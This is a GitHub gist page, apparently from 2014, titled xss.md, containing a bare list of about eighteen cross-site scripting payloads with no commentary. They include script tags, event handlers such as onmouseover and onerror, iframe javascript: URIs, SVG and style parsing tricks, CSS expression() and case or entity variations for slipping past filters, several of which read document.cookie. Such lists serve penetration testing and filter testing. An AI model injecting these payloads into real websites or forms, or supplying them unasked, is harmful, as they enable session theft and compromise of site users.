Skip to content

Instantly share code, notes, and snippets.

@ntddk

ntddk/xss.md

Created October 8, 2014 19:23
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save ntddk/063d92c815ed97c8e915 to your computer and use it in GitHub Desktop.
Save ntddk/063d92c815ed97c8e915 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
xss.md
  • '';!--"<XSS>=&{()}``\"
  • <script>alert(XSS);</script>
  • "><script>alert(XSS);</script>
  • <ScrIpt>alert(1);</SCript>
  • <a onmouseover="alert(document.cookie)">XSS</a>
  • <a onmouseover=alert(document.cookie)>XSS</a>
  • <<script>alert("XSS");//<</script>
  • <iframe src="javascript:alert('XSS');"></iframe>
  • <iframe src=# onmouseover="alert(document.cookie)"></iframe>
  • <img src="http://www.example.com/>"onerror="alert(document.cookie)//<">
  • <![CDATA["><script>alert("XSS")</script><!--]]>
  • ";alert(document.domain)//
  • <SELECT NAME="" onmouseover=alert(XSS)></select>
  • <style><img src='</style><img src=x onerror=alert("XSS")//'>
  • <svg><style><img/src=x onerror=alert(XSS)// </b>
  • "><svg><script>alert&#40/1/.source&#41</script>
  • <div style="left:expression(alert('XSS'))">
  • <div style="left:expRessioN(alert('XSS'))">
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment